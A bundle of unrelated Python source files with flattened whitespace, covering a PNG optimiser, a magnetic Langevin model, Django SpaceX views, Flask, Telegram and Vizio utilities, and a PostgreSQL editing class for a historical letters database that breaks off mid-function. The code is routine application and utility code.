'pngcrush' git = 'git' folders = ["src/qt/res/movies", "src/qt/res/icons", "share/pixmaps"] basePath = subprocess.check_output([git, 'rev-parse', '--show-toplevel']).rstrip('\n') totalSaveBytes = 0 noHashChange = True outputArray = [] for folder in folders: absFolder=os.path.join(basePath, folder) for file in os.listdir(absFolder): extension = os.path.splitext(file)[1] if extension.lower() == '.png': print("optimizing "+file+"..."), file_path = os.path.join(absFolder, file) fileMetaMap = {'file' : file, 'osize': os.path.getsize(file_path), 'sha256Old' : file_hash(file_path)} fileMetaMap['contentHashPre'] = content_hash(file_path) pngCrushOutput = "" try: pngCrushOutput = subprocess.check_output( [pngcrush, "-brute", "-ow", "-rem", "gAMA", "-rem", "cHRM", "-rem", "iCCP", "-rem", "sRGB", "-rem", "alla", "-rem", "text", file_path], stderr=subprocess.STDOUT).rstrip('\n') except: print "pngcrush is not installed, aborting..." sys.exit(0) #verify if "Not a PNG file" in subprocess.check_output([pngcrush, "-n", "-v", file_path], stderr=subprocess.STDOUT): print "PNG file "+file+" is corrupted after crushing, check out pngcursh version" sys.exit(1) fileMetaMap['sha256New'] = file_hash(file_path) fileMetaMap['contentHashPost'] = content_hash(file_path) if fileMetaMap['contentHashPre'] != fileMetaMap['contentHashPost']: print "Image contents of PNG file "+file+" before and after crushing don't match" sys.exit(1) fileMetaMap['psize'] = os.path.getsize(file_path) outputArray.append(fileMetaMap) print("done\n"), print "summary:\n+++++++++++++++++" for fileDict in outputArray: oldHash = fileDict['sha256Old'] newHash = fileDict['sha256New'] totalSaveBytes += fileDict['osize'] - fileDict['psize'] noHashChange = noHashChange and (oldHash == newHash) print fileDict['file']+"\n size diff from: "+str(fileDict['osize'])+" to: "+str(fileDict['psize'])+"\n old sha256: "+oldHash+"\n new sha256: "+newHash+"\n" print "completed. Checksum stable: "+str(noHashChange)+". Total reduction: "+str(totalSaveBytes)+" bytes" # -*- coding: utf-8 -*- from numpy import cosh, sinh, ndarray, argwhere, isnan as np_isnan from math import isnan def BH_func(self, H, Bs, a): """ Return the B from H according to Langevin model. Parameters ---------- self : ModelBH_Langevin a ModelBH_Langevin object Returns ------- B: numpy.ndarray B(H) values """ B = Bs * (cosh(H / a) / sinh(H / a) - a / H) if isinstance(B, ndarray): B[argwhere(np_isnan(B))] = Bs B[argwhere(H == 0)] = 0 elif isnan(B): if H == 0: B = 0 else: B = Bs return B from slides_configuration import * response = slides_api.get_document_properties("test.pptx") print(response)from django.shortcuts import render,HttpResponse,HttpResponseRedirect import requests from datetime import datetime from django.urls import reverse from .models import * base_link = "https://api.spacexdata.com/v3/" def updateLaunches(): response = requests.get(base_link + "launches") json_object = response.json() launch_details = [] for item in json_object: new_launch = {} new_launch.update({"flight_number":item["flight_number"]}) timestamp = item["launch_date_unix"] dt_object = datetime.strftime(datetime.fromtimestamp(timestamp),"%Y-%m-%d") new_launch.update({"launch_date":dt_object}) new_launch.update({"rocket_name":item["rocket"]["rocket_name"]}) new_launch.update({"mission_patch_link":item["links"]["mission_patch_small"]}) new_launch.update({"reddit_launch":item["links"]["reddit_launch"]}) new_launch.update({"video_link":item["links"]["video_link"]}) new_launch.update({"wikipedia":item["links"]["wikipedia"]}) new_launch.update({"article_link":item["links"]["article_link"]}) new_launch.update({"details":item["details"]}) new_launch.update({"launch_success":item["launch_success"]}) if Launches.objects.filter(flight_number=new_launch.get("flight_number")).exists(): l = Launches.objects.filter(flight_number=new_launch.get("flight_number")).update(**new_launch) else: l = Launches(**new_launch) l.save() def updateMissions(): response = requests.get(base_link + "missions") json_object = response.json() mission_details = [] for item in json_object: new_mission = {} new_mission.update({"mission_name":item["mission_name"]}) new_mission.update({"mission_id":item["mission_id"]}) new_mission.update({"wikipedia":item["wikipedia"]}) new_mission.update({"twitter":item["twitter"]}) new_mission.update({"website":item["website"]}) new_mission.update({"description":item["description"]}) if Mission.objects.filter(mission_id=new_mission.get("mission_id")).exists(): m = Mission.objects.filter(mission_id=new_mission.get("mission_id")).update(**new_mission) else: m = Mission(**new_mission) m.save() def updateCores(): response = requests.get(base_link + "cores") json_object = response.json() core_details = [] for item in json_object: new_core = {} new_core.update({"core_serial":item["core_serial"]}) timestamp = item["original_launch_unix"] if timestamp != None: dt_object = datetime.strftime(datetime.fromtimestamp(timestamp),"%Y-%m-%d") new_core.update({"launch_date":dt_object}) new_core.update({"mission_name":item["missions"][0]["name"]}) new_core.update({"mission_flight":item["missions"][0]["flight"]}) new_core.update({"details":item["details"]}) if Core.objects.filter(core_serial=new_core.get("core_serial")).exists(): m = Core.objects.filter(core_serial=new_core.get("core_serial")).update(**new_core) else: m = Core(**new_core) m.save() def updateRockets(): response = requests.get(base_link + "rockets") json_object = response.json() rocket_details = [] for item in json_object: new_rocket = {} new_rocket.update({"rocket_number":item["id"]}) new_rocket.update({"active":item["active"]}) new_rocket.update({"cost_per_launch":item["cost_per_launch"]}) new_rocket.update({"country":item["country"]}) new_rocket.update({"wikipedia":item["wikipedia"]}) new_rocket.update({"rocket_id":item["rocket_id"]}) new_rocket.update({"description":item["description"]}) new_rocket.update({"rocket_name":item["rocket_name"]}) first_flight = datetime.strptime(item["first_flight"],"%Y-%m-%d") new_rocket.update({"first_flight":first_flight}) if Rocket.objects.filter(rocket_id=new_rocket.get("rocket_id")).exists(): m = Rocket.objects.filter(rocket_id=new_rocket.get("rocket_id")).update(**new_rocket) else: m = Rocket(**new_rocket) m.save() def home(request): latest_launch = Launches.objects.filter(launch_date__lte=datetime.now()).last() next_launch = Launches.objects.filter(launch_date__gte=datetime.now()).first() context = { 'latest': latest_launch, 'next': next_launch, } return render(request,"home.html",context) def allLaunches(request): no = Launches.objects.first().id return HttpResponseRedirect(reverse('main:launches',kwargs={'no':no,'category':"all"})) def launchesPast(request): no = Launches.objects.filter(launch_success__isnull=False).first().id return HttpResponseRedirect(reverse('main:launches',kwargs={'no':no,'category':"past"})) def launchesUpcoming(request): no = Launches.objects.filter(launch_success__isnull=True).first().id return HttpResponseRedirect(reverse('main:launches',kwargs={'no':no,'category':"upcoming"})) def launches(request,category,no): if request.method == "POST": if 'refresh' in request.POST: updateLaunches() return HttpResponseRedirect(reverse('main:launches',kwargs={'no':no,'category':category})) elif 'filter' in request.POST: category = request.POST['category'] if category=="upcoming": return HttpResponseRedirect(reverse('main:launchesUpcoming')) elif category=="past": return HttpResponseRedirect(reverse('main:launchesPast')) else: return HttpResponseRedirect(reverse('main:allLaunches')) if category=="all": launch_details = Launches.objects.all() elif category=="upcoming": launch_details = Launches.objects.filter(launch_success__isnull=True) elif category=="past": launch_details = Launches.objects.filter(launch_success__isnull=False) current_launch = launch_details.filter(id=no)[0] context = { 'launch_details': launch_details, 'current':current_launch, 'no':no, 'category':category, } return render(request,"launches.html",context) def allMissions(request): no = Mission.objects.first().id return HttpResponseRedirect(reverse('main:missions',kwargs={'no':no})) def missions(request,no): if request.method == "POST": updateMissions() return HttpResponseRedirect(reverse('main:missions',kwargs={'no':no})) mission_details = Mission.objects.all() current_mission = Mission.objects.filter(id=no)[0] context = { 'mission_details': mission_details, 'current':current_mission, 'no':no, } return render(request,"missions.html",context) def allCores(request): no = Mission.objects.first().id return HttpResponseRedirect(reverse('main:cores',kwargs={'no':no})) def cores(request,no): if request.method == "POST": updateCores() return HttpResponseRedirect(reverse('main:cores',kwargs={'no':no})) core_details = Core.objects.all() current_core = Core.objects.filter(id=no)[0] context = { 'core_details': core_details, 'current':current_core, 'no':no, } return render(request,"cores.html",context) def allRockets(request): updateRockets() no = Mission.objects.first().id return HttpResponseRedirect(reverse('main:rockets',kwargs={'no':no})) def rockets(request,no): if request.method == "POST": updateRockets() return HttpResponseRedirect(reverse('main:rockets',kwargs={'no':no})) rocket_details = Rocket.objects.all() current_rocket = Rocket.objects.filter(id=no)[0] context = { 'rocket_details': rocket_details, 'current':current_rocket, 'no':no, } return render(request,"rockets.html",context)from src.db.db import Base from sqlalchemy import Column, String, Integer, BigInteger class NotifyUserList(Base): __tablename__ = 'notify_user_list' id = Column(Integer, primary_key=True) discord_username = Column(String, nullable=False) mention = Column(String, nullable=False) github_username = Column(String, nullable=False) def __init__(self, discord_username: str, github_username: str, mention: str): self.discord_username = discord_username self.github_username = github_username self.mention = mention def __repr__(self) -> str: return f'NotifyUserList({self.discord_username}, {self.github_username})' class NotifyChannelList(Base): __tablename__ = 'notify_channel_list' id = Column(Integer, primary_key=True) discord_channel = Column(BigInteger, nullable=False) github_username = Column(String, nullable=False) github_repo = Column(String, nullable=False) def __init__(self, discord_channel: int, github_username: str, github_repo: str) -> None: self.github_username = github_username self.discord_channel = discord_channel self.github_repo = github_repo def __repr__(self) -> str: return f'NotifyChannelList({self.github_repo}, {self.discord_channel})' from rubrix.server.apis.v0.models.metrics.token_classification import ( MentionMetrics, TokenMetrics, TokenTagMetrics, ) from rubrix.server.elasticseach.mappings.helpers import mappings from rubrix.server.elasticseach.query_helpers import nested_mappings_from_base_model def mentions_mappings(): return { "type": "nested", "properties": { "mention": mappings.keyword_field(), "entity": mappings.keyword_field(), "score": mappings.decimal_field(), }, } def token_classification_mappings(): metrics_mentions_mappings = nested_mappings_from_base_model(MentionMetrics) metrics_tags_mappings = nested_mappings_from_base_model(TokenTagMetrics) _mentions_mappings = mentions_mappings() # TODO: remove return { "_source": mappings.source( excludes=[ # "words", # Cannot be exclude since comment text_length metric is computed using this source fields "predicted", "predicted_as", "predicted_by", "annotated_as", "annotated_by", "score", "predicted_mentions", "mentions", ] ), "properties": { "predicted": mappings.keyword_field(), "annotated_as": mappings.keyword_field(enable_text_search=True), "predicted_as": mappings.keyword_field(enable_text_search=True), "score": {"type": "float"}, "predicted_mentions": _mentions_mappings, # TODO: remove "mentions": _mentions_mappings, # TODO: remove "tokens": mappings.keyword_field(), "metrics.tokens": nested_mappings_from_base_model(TokenMetrics), "metrics.predicted.mentions": metrics_mentions_mappings, "metrics.annotated.mentions": metrics_mentions_mappings, "metrics.predicted.tags": metrics_tags_mappings, "metrics.annotated.tags": metrics_tags_mappings, }, } # Copyright 2019 IBM Corporation All Rights Reserved. # # SPDX-License-Identifier: Apache-2.0 # pythonspot.com from flask import Flask, render_template, flash, request from wtforms import Form, TextField, TextAreaField, validators, StringField, SubmitField import os from redisUtils import RedisStream # App config. DEBUG = True #static_folder='/opt/static' #template_folder="/opt/templates" app = Flask(__name__) app.config.from_object(__name__) app.config['SECRET_KEY'] = os.urandom(12) redis_queue = os.environ.get('WAIT_QUEUE', "demo_wait_q_0") r = RedisStream() class ReusableForm(Form): task = TextField('Task:', validators=[validators.required(), validators.Length(min=1)]) @app.route("/", methods=['GET', 'POST']) def run(): form = ReusableForm(request.form) print(form.errors) if request.method == 'POST': task=request.form['task'] print(task) if form.validate(): # Save the comment here. flash('Thanks for your task: ' + task) r.pushTask(redis_queue, task) else: flash('Error: WTF is your task?') return render_template('form.html', form=form) def main(): app.run(host='0.0.0.0') if __name__ == "__main__": main() from aiogram.dispatcher import Dispatcher from aiogram.contrib.fsm_storage.redis import RedisStorage2 from src.tg.zverobot import ZveroBot from src.config import Config cfg = Config() cfg.with_env() storage = RedisStorage2(host="redis-local") bot = ZveroBot(cfg) dp = Dispatcher(bot, storage=storage) <gh_stars>10-100 """pyvizio utility module.""" import json from typing import Any, Dict, List, Optional, Union from aiohttp import ClientError, ClientSession from pyvizio.util.const import ( APK_SOURCE_PATH, APP_NAMES_FILE, APP_NAMES_URL, APP_PAYLOADS_FILE, APP_PAYLOADS_URL, RESOURCE_PATH, ) async def gen_apps_list_from_url( app_names_url: str = APP_NAMES_URL, app_payloads_url: str = APP_PAYLOADS_URL, session: ClientSession = None, ) -> Optional[List[Dict[str, Union[str, List[Union[str, Dict[str, Any]]]]]]]: """Get app JSON files from external URLs and return list of apps for use in pyvizio.""" headers = {"Content-Type": "application/json"} try: if session: response = await session.get( app_names_url, headers=headers, raise_for_status=True ) app_names = await response.json(content_type=None) response = await session.get( app_payloads_url, headers=headers, raise_for_status=True ) app_configs = await response.json(content_type=None) else: async with ClientSession() as local_session: response = await local_session.get( app_names_url, headers=headers, raise_for_status=True ) app_names = await response.json(content_type=None) response = await local_session.get( app_payloads_url, headers=headers, raise_for_status=True ) app_configs = await response.json(content_type=None) return gen_apps_list(app_names, app_configs) except ClientError: return None def gen_apps_list_from_src( apk_source_path: str = APK_SOURCE_PATH, resource_path: str = RESOURCE_PATH ) -> List[Dict[str, Union[str, List[Union[str, Dict[str, Any]]]]]]: """Parse JSON from VizioCast Android app source in `apk_source_path`/`resource_path` and return list of apps for use in pyvizio.""" base_path = f"{apk_source_path}/{resource_path}" app_names_filepath = f"{base_path}/{APP_NAMES_FILE}" app_configs_filepath = f"{base_path}/{APP_PAYLOADS_FILE}" with open(app_names_filepath) as f: app_names = json.load(f) with open(app_configs_filepath) as f: app_configs = json.load(f) return gen_apps_list(app_names, app_configs) def gen_apps_list( app_names: List[Dict[str, Any]], app_configs: List[Dict[str, Any]] ) -> List[Dict[str, Union[str, List[Union[str, Dict[str, Any]]]]]]: """Parse list of app names and app configs and return list of apps for use in pyvizio.""" pyvizio_apps: List[Dict[str, Union[str, List[Union[str, Dict[str, Any]]]]]] = [] for app_name in app_names: # returns first app where condition is true app_config = next( ( app_config for app_config in app_configs if app_config["id"] == app_name["id"] ) ) if app_config: config_json = app_config["chipsets"]["*"][0]["app_type_payload"] config = json.loads(config_json) app_already_exists = False for pyvizio_app in pyvizio_apps: if pyvizio_app["name"].lower() == app_name["name"].lower(): pyvizio_app["id"].append(app_name["id"]) pyvizio_app["config"].append(config) app_already_exists = True break if not app_already_exists: pyvizio_apps.append( { "name": app_name["name"], "country": [country.lower() for country in app_name["country"]], "id": [app_name["id"]], "config": [config], } ) return pyvizio_apps <filename>cgm/inference/__init__.py<gh_stars>1-10 from .belief_propagation import * from .variable_elimination import * from .forward_sampling import *from py_compile import compile from os import path if __name__ == '__main__': destination = path.realpath(path.curdir)+'/WallpaperChanger.pyc' print('Destination: %s' % destination) compile('main.py', destination) from setuptools import setup, find_packages setup( name='nameko-clutch', version='0.1-alpha', description='@TODO', long_description='@TODO', author='<NAME>', author_email='<EMAIL>', url='https://github.com/NJoyX/nameko-clutch', license='Apache License, Version 2.0', packages=find_packages(), install_requires=[ "nameko", "six" ], extras_require={}, include_package_data=True, zip_safe=False, keywords=['nameko', 'cluster', 'distributed'], classifiers=[ "Operating System :: MacOS :: MacOS X", "Operating System :: POSIX", 'Programming Language :: Python', 'Programming Language :: Python :: 2.7', "Topic :: Internet", "Topic :: Software Development :: Libraries :: Python Modules", "Intended Audience :: Developers", ] ) # -*- coding: utf-8 -*- from __future__ import print_function import sys import csv import json import os.path from datetime import datetime import psycopg2 import psycopg2.extras #import csv_unicode class DatabaseTweaker: @classmethod def tweaker_from_connection( cls, dbname, host, port, user, password, debug=None ): postgres_connection = "dbname='" + dbname + "'" \ + " host='" + host + "' port='" + port + "'" \ + " user='" + user + "' password='" + password + "'" dt = cls( postgres_connection, debug ) return dt def __init__( self, connection=None, debug=False ): self.debug = False self.set_debug(debug) self.connection = self.cursor = None if connection: self.connect_to_postres(connection) # e.g. "dbname='<HERE>' user='<HERE>' host='<HERE>' password='<HERE>'" self._reset_audit() self.user = "cofkbot" self.schema = None def _reset_audit(self): self.audit = { "deletions" : {}, "insertions" : {}, "updates" : {} } def set_debug(self, debug): self.debug = debug if debug: print( "Debug ON - printing SQL" ) def connect_to_postres(self, connection): try: self.connection = psycopg2.connect( connection ) except: print( "ERROR: I am unable to connect to the database" ) sys.exit(1) else: if self.debug : print( "Connected to database..." ) self.cursor = self.connection.cursor(cursor_factory=psycopg2.extras.DictCursor) def close(self): self.connection.close() self.connection = self.cursor = None @staticmethod def get_csv_data( filename ): rows = [] with open( filename ) as file : csv_file = csv.DictReader( file, dialect=csv.excel ) for row in csv_file: rows.append( row ) return rows def get_work_from_iwork_id( self, iwork_id ): self.check_database_connection() command = "SELECT * FROM cofk_union_work WHERE iwork_id=%s" command = self.cursor.mogrify( command, (int(iwork_id),) ) if self.debug : print( "* SELECT work:", command ) self.cursor.execute( command ) return self.cursor.fetchone() def get_resource_from_resource_id( self, resource_id ): self.check_database_connection() command = "SELECT * FROM cofk_union_resource WHERE resource_id=%s" command = self.cursor.mogrify( command, (resource_id,) ) if self.debug : print( "* SELECT resource:", command ) self.cursor.execute( command ) return self.cursor.fetchone() def get_image_from_image_id( self, image_id ): self.check_database_connection() command = "SELECT * FROM cofk_union_image WHERE image_id=%s" command = self.cursor.mogrify( command, (image_id,) ) if self.debug : print( "* SELECT image:", command ) self.cursor.execute( command ) return self.cursor.fetchone() def get_comment_from_comment_id( self, comment_id ): self.check_database_connection() command = "SELECT * FROM cofk_union_comment WHERE comment_id=%s" command = self.cursor.mogrify( command, (comment_id,) ) if self.debug : print( "* SELECT comment:", command ) self.cursor.execute( command ) return self.cursor.fetchone() def get_institution_from_institution_id( self, institution_id ): self.check_database_connection() command = "SELECT * FROM cofk_union_institution WHERE institution_id=%s" command = self.cursor.mogrify( command, (institution_id,) ) if self.debug : print( "* SELECT institution:", command ) self.cursor.execute( command ) return self.cursor.fetchone() def get_location_from_location_id( self, location_id ): self.check_database_connection() command = "SELECT * FROM cofk_union_location WHERE location_id=%s" command = self.cursor.mogrify( command, (location_id,) ) if self.debug : print( "* SELECT location:", command ) self.cursor.execute( command ) return self.cursor.fetchone() def get_person_from_iperson_id( self, iperson_id ): self.check_database_connection() command = "SELECT * FROM cofk_union_person WHERE iperson_id=%s" command = self.cursor.mogrify( command, (iperson_id,) ) if self.debug : print( "* SELECT person:", command ) self.cursor.execute( command ) return self.cursor.fetchone() def get_manifestation_from_manifestation_id( self, manifestation_id ): self.check_database_connection() command = "SELECT * FROM cofk_union_manifestation WHERE manifestation_id=%s" command = self.cursor.mogrify( command, (manifestation_id,) ) if self.debug : print( "* SELECT manifestation:", command ) self.cursor.execute( command ) return self.cursor.fetchone() def get_relationships(self, id_from, table_from=None, table_to=None ): """ Use "table_from" and "table_to" to limit the results. :param id_from: Get relationships for this object :param table_from: limit to these type of tables on left (e.g. "cofk_union_work") :param table_to: limit to these type of tables on right (e.g. "cofk_union_work") :return: Use the returned "table_name" and "id_value" which represent the thing that is connected to the given id (id_from). """ self.check_database_connection() command = "SELECT * FROM cofk_union_relationship" if table_from : command += " WHERE ((left_id_value=%s and left_table_name=%s)" command += " or (right_id_value=%s and right_table_name=%s))" values = [ id_from, table_from, id_from, table_from ] else: command += " WHERE ((left_id_value=%s or right_id_value=%s))" values = [ id_from, id_from ] if table_to : command += " and (left_table_name=%s or right_table_name=%s)" values.extend( [ table_to, table_to ] ) command = self.cursor.mogrify( command, values ) if self.debug : print( "* SELECT relationships:", command ) self.cursor.execute( command ) results = self.cursor.fetchall() # Tweak the returns so we can see what is related without having to know if it's on the left or the right! simple_results = [] for result in results: # in some cases (i guess...) something could be related to itself, in this case the simple_result = dict(result) # Repeat the relation in own variables (otherwise it's not clear if you should take the right or left...) simple_result["table_name"] = result['left_table_name'] if table_from == result['right_table_name'] else result['right_table_name'] simple_result["id_value"] = result['left_id_value'] if id_from == result['right_id_value'] else result['right_id_value'] simple_results.append(simple_result) # simple_results.append( { # "relationship_id" : result['relationship_id'], # # "table_name" : result['left_table_name'] if table_from == result['right_table_name'] else result['right_table_name'] # "id_value" : result['left_id_value'] if id_from == result['right_id_value'] else result['right_table_name'], # # "relationship_type" : result["relationship_type"] # # }) return simple_results def update_person(self, person_id, field_updates={}, print_sql=False, anonymous=False ): self._update( person_id, field_updates, "cofk_union_person", "person_id", "person", print_sql, anonymous ) def update_person_from_iperson(self, iperson_id, field_updates={}, print_sql=False, anonymous=False ): self._update( iperson_id, field_updates, "cofk_union_person", "iperson_id", "person", print_sql, anonymous ) def update_work(self, work_id, field_updates={}, print_sql=False, anonymous=False ): self._update( work_id, field_updates, "cofk_union_work", "work_id", "work", print_sql, anonymous ) def update_work_from_iwork(self, iwork_id, field_updates={}, print_sql=False, anonymous=False ): self._update( iwork_id, field_updates, "cofk_union_work", "iwork_id", "work", print_sql, anonymous ) def update_manifestation(self, manifestation_id, field_updates={}, print_sql=False, anonymous=False ): self._update( manifestation_id, field_updates, "cofk_union_manifestation", "manifestation_id", "manifestation", print_sql, anonymous) def update_comment(self, comment_id, field_updates={}, print_sql=False, anonymous=False ): self._update( comment_id, field_updates, "cofk_union_comment", "comment_id", "comment", print_sql, anonymous ) def update_resource(self, resource_id, field_updates={}, print_sql=False, anonymous=False ): self._update( resource_id, field_updates, "cofk_union_resource", "resource_id", "resource", print_sql, anonymous ) def update_institution(self, institution_id, field_updates={}, print_sql=False, anonymous=False ): self._update( institution_id, field_updates, "cofk_union_institution", "institution_id", "institution", print_sql, anonymous) def update_image(self, image_id, field_updates={}, print_sql=False, anonymous=False ): self._update( image_id, field_updates, "cofk_union_image", "image_id", "image", print_sql, anonymous) def update_location(self, location_id, field_updates={}, print_sql=False, anonymous=False ): self._update( location_id, field_updates, "cofk_union_location", "location_id", "location", print_sql, anonymous) def _update( self, type_id, field_updates, update_table, where_field, type_name, print_sql=False, anonymous=False ): self.check_database_connection() # Create a list with all the data in. fields = list(field_updates.keys()) data = [] for field in fields : data.append( field_updates[field] ) # Ensuring order preserved. if not anonymous and "change_user" not in fields : fields.append( "change_user" ) data.append( self.user ) data.append( type_id ) # For where field # Create command command = "UPDATE " + update_table + " " command += "SET " count = 1 for field in fields : command += field + "=%s" if count != len(fields) : command += ", " count += 1 command += " WHERE " + where_field + "=%s" command = self.cursor.mogrify( command, data ) if self.debug or print_sql: print( "* UPDATE " + type_name + ":", command ) self.cursor.execute( command ) self._audit_update( type_name ) def delete_resource_via_resource_id( self, resource_id ): self.check_database_connection() command = "DELETE FROM cofk_union_resource WHERE resource_id=%s" command = self.cursor.mogrify( command, (resource_id,) ) self._print_command( "DELETE resource", command ) self._audit_delete("resource") self.cursor.execute( command ) def delete_relationship_via_relationship_id( self, relationship_id ): self.check_database_connection() command = "DELETE FROM cofk_union_relationship WHERE relationship_id=%s" command = self.cursor.mogrify( command, (relationship_id,) ) self._print_command( "DELETE relationship", command ) self._audit_delete("relationship") self.cursor.execute( command ) def delete_comment_via_comment_id( self, comment_id ): self.check_database_connection() command = "DELETE FROM cofk_union_comment WHERE comment_id=%s" command = self.cursor.mogrify( command, (comment_id,) ) self._print_command( "DELETE comment", command ) self._audit_delete("comment") self.cursor.execute( command ) def delete_manifestation_via_manifestation_id( self, manifestation_id ): self.check_database_connection() command = "DELETE FROM cofk_union_manifestation WHERE manifestation_id=%s" command = self.cursor.mogrify( command, (manifestation_id,) ) self._print_command( "DELETE manifestation", command ) self._audit_delete("manifestation") self.cursor.execute( command ) def delete_work_via_iwork_id( self, iwork_id ): self.check_database_connection() command = "DELETE FROM cofk_union_work WHERE iwork_id=%s" command = self.cursor.mogrify( command, (iwork_id,) ) self._print_command( "DELETE work", command ) self._audit_delete("work") self.cursor.execute( command ) def create_resource(self, name, url, description="" ): self.check_database_connection() command = "INSERT INTO cofk_union_resource" \ " (resource_name,resource_url,resource_details,creation_user,change_user)" \ " VALUES " \ " ( %s,%s,%s,%s,%s)" \ " returning resource_id" command = self.cursor.mogrify( command, ( name, url, description, self.user, self.user ) ) self._print_command( "INSERT resource", command ) self._audit_insert( "resource" ) self.cursor.execute( command ) return self.cursor.fetchone()[0] def create_comment(self, comment ): self.check_database_connection() command = "INSERT INTO cofk_union_comment" \ " (comment,creation_user,change_user)" \ " VALUES " \ " ( %s,%s,%s)" \ " returning comment_id" command = self.cursor.mogrify( command, ( comment, self.user, self.user ) ) self._print_command( "INSERT comment", command ) self._audit_insert( "comment" ) self.cursor.execute( command ) return self.cursor.fetchone()[0] def create_image(self, filename, display_order, image_credits, can_be_displayed='Y', thumbnail=None ): self.check_database_connection() command = "INSERT INTO cofk_union_image" \ " (image_filename,display_order,credits,can_be_displayed,thumbnail,licence_url,creation_user,change_user)" \ " VALUES " \ " ( %s,%s,%s,%s,%s,%s,%s,%s)" \ " returning image_id" command = self.cursor.mogrify( command, ( filename, display_order, image_credits, can_be_displayed, thumbnail, "http://cofk2.bodleian.ox.ac.uk/culturesofknowledge/licence/terms_of_use.html", self.user, self.user ) ) self._print_command( "INSERT image", command ) self._audit_insert( "image" ) self.cursor.execute( command ) return self.cursor.fetchone()[0] def create_manifestation(self, manifestation_id, manifestation_type, printed_edition_details=None, id_number_or_shelfmark=None ): self.check_database_connection() command = "INSERT INTO cofk_union_manifestation" \ " (manifestation_id,manifestation_type,id_number_or_shelfmark,printed_edition_details,creation_user,change_user)" \ " VALUES " \ " ( %s,%s,%s,%s,%s,%s)" \ " returning manifestation_id" command = self.cursor.mogrify( command, ( manifestation_id, manifestation_type, id_number_or_shelfmark, printed_edition_details, self.user, self.user ) ) self._print_command( "INSERT manifestation", command ) self._audit_insert( "manifestation" ) self.cursor.execute( command ) return self.cursor.fetchone()[0] def create_relationship(self, left_name, left_id, relationship_type, right_name, right_id ): self.check_database_connection() command = "INSERT INTO cofk_union_relationship" \ " (left_table_name,left_id_value, relationship_type, right_table_name, right_id_value,creation_user,change_user)" \ " VALUES " \ " (%s, %s, %s, %s, %s,%s,%s)"\ " returning relationship_id" command = self.cursor.mogrify( command, ( left_name, left_id, relationship_type, right_name, right_id, self.user, self.user ) ) self._print_command( "INSERT relationship", command ) self._audit_insert( "relationship" ) self.cursor.execute( command ) return self.cursor.fetchone()[0] # Created / author / authored def create_relationship_created(self, person_id, work_id ): self.create_relationship('cofk_union_person', person_id, 'created', 'cofk_union_work', work_id ) # addressed / sent def create_relationship_addressed_to(self, work_id, person_id ): self.create_relationship( 'cofk_union_work', work_id, 'was_addressed_to', 'cofk_union_person', person_id ) def create_relationship_mentions(self, work_id, person_id ): self.create_relationship( 'cofk_union_work', work_id, 'mentions', 'cofk_union_person', person_id ) # sent to / destination def create_relationship_was_sent_to(self, work_id, location_id ): self.create_relationship( 'cofk_union_work', work_id, 'was_sent_to', 'cofk_union_location', location_id ) # sent from / origin def create_relationship_was_sent_from(self, work_id, location_id ): self.create_relationship( 'cofk_union_work', work_id, 'was_sent_from', 'cofk_union_location', location_id ) def create_relationship_mentions_place(self, work_id, location_id ): self.create_relationship( 'cofk_union_work', work_id, 'mentions_place', 'cofk_union_location', location_id ) def create_relationship_work_resource(self, work_id, resource_id ): self.create_relationship( 'cofk_union_work', work_id, 'is_related_to', 'cofk_union_resource', resource_id ) def create_relationship_person_resource(self, person_id, resource_id ): self.create_relationship( 'cofk_union_person', person_id, 'is_related_to', 'cofk_union_resource', resource_id ) def create_relationship_note_on_work_route(self, comment_id, work_id ): self.create_relationship( 'cofk_union_comment', comment_id, 'route', 'cofk_union_work', work_id ) def create_relationship_note_on_work_date(self, comment_id, work_id ): self.create_relationship( 'cofk_union_comment', comment_id, 'refers_to_date', 'cofk_union_work', work_id ) def create_relationship_note_on_work_author(self, comment_id, work_id ): self.create_relationship( 'cofk_union_comment', comment_id, 'refers_to_author', 'cofk_union_work', work_id ) def create_relationship_note_on_work_origin(self, comment_id, work_id ): self.create_relationship( 'cofk_union_comment', comment_id, 'refers_to_origin', 'cofk_union_work', work_id ) def create_relationship_note_on_work_destination(self, comment_id, work_id ): self.create_relationship( 'cofk_union_comment', comment_id, 'refers_to_destination', 'cofk_union_work', work_id ) def create_relationship_note_on_work_generally(self, comment_id, work_id ): self.create_relationship( 'cofk_union_comment', comment_id, 'refers_to', 'cofk_union_work', work_id ) def create_relationship_note_on_work_people_mentioned(self, comment_id, work_id ): self.create_relationship( 'cofk_union_comment', comment_id, 'refers_to_people_mentioned_in_work', 'cofk_union_work', work_id ) def create_relationship_note_on_work_addressee(self, comment_id, work_id ): self.create_relationship( 'cofk_union_comment', comment_id, 'refers_to_addressee', 'cofk_union_work', work_id ) def create_relationship_note_on_person(self, comment_id, person_id ): self.create_relationship( 'cofk_union_comment', comment_id, 'refers_to', 'cofk_union_person', person_id ) def create_relationship_work_reply_to(self, work_reply_id, work_id ): self.create_relationship( 'cofk_union_work', work_reply_id, 'is_reply_to', 'cofk_union_work', work_id ) def create_relationship_note_manifestation(self, comment_id, manifestation_id ): self.create_relationship( 'cofk_union_comment', comment_id, 'refers_to', 'cofk_union_manifestation', manifestation_id ) def create_relationship_manifestation_in_repository(self, manifestation_id, repository_id ): self.create_relationship( 'cofk_union_manifestation', manifestation_id, 'stored_in', 'cofk_union_institution', repository_id ) def create_relationship_manifestation_of_work(self, manifestation_id, work_id ): self.create_relationship( 'cofk_union_manifestation', manifestation_id, 'is_manifestation_of', 'cofk_union_work', work_id ) def create_work(self, work_id_end, abstract=None, accession_code=None, addressees_as_marked=None, addressees_inferred=0, addressees_uncertain=0, authors_as_marked=None, authors_inferred=0, authors_uncertain=0, date_of_work2_std_day=None, date_of_work2_std_month=None, date_of_work2_std_year=None, date_of_work_approx=0, date_of_work_as_marked=None, date_of_work_inferred=0, date_of_work_std_day=None, date_of_work_std_is_range=0, date_of_work_std_month=None, date_of_work_std_year=None, date_of_work_uncertain=0, description=None, destination_as_marked=None, destination_inferred=0, destination_uncertain=0, edit_status='', editors_notes=None, explicit=None, incipit=None, keywords=None, language_of_work=None, origin_as_marked=None, origin_inferred=0, origin_uncertain=0, original_calendar=None, original_catalogue=None, ps=None, relevant_to_cofk='Y', work_is_translation=0, work_to_be_deleted=0 ): change_user = self.user creation_user = self.user work_id_base = "work_" + datetime.strftime( datetime.now(), "%Y%m%d%H%M%S%f" ) + "_" # e.g work_20181108182143954875_ work_id = work_id_base + work_id_end addressees_inferred = self.get_int_value(addressees_inferred, 0) addressees_uncertain = self.get_int_value(addressees_uncertain, 0) authors_inferred = self.get_int_value(authors_inferred, 0) authors_uncertain = self.get_int_value(authors_uncertain, 0) date_of_work2_std_day = 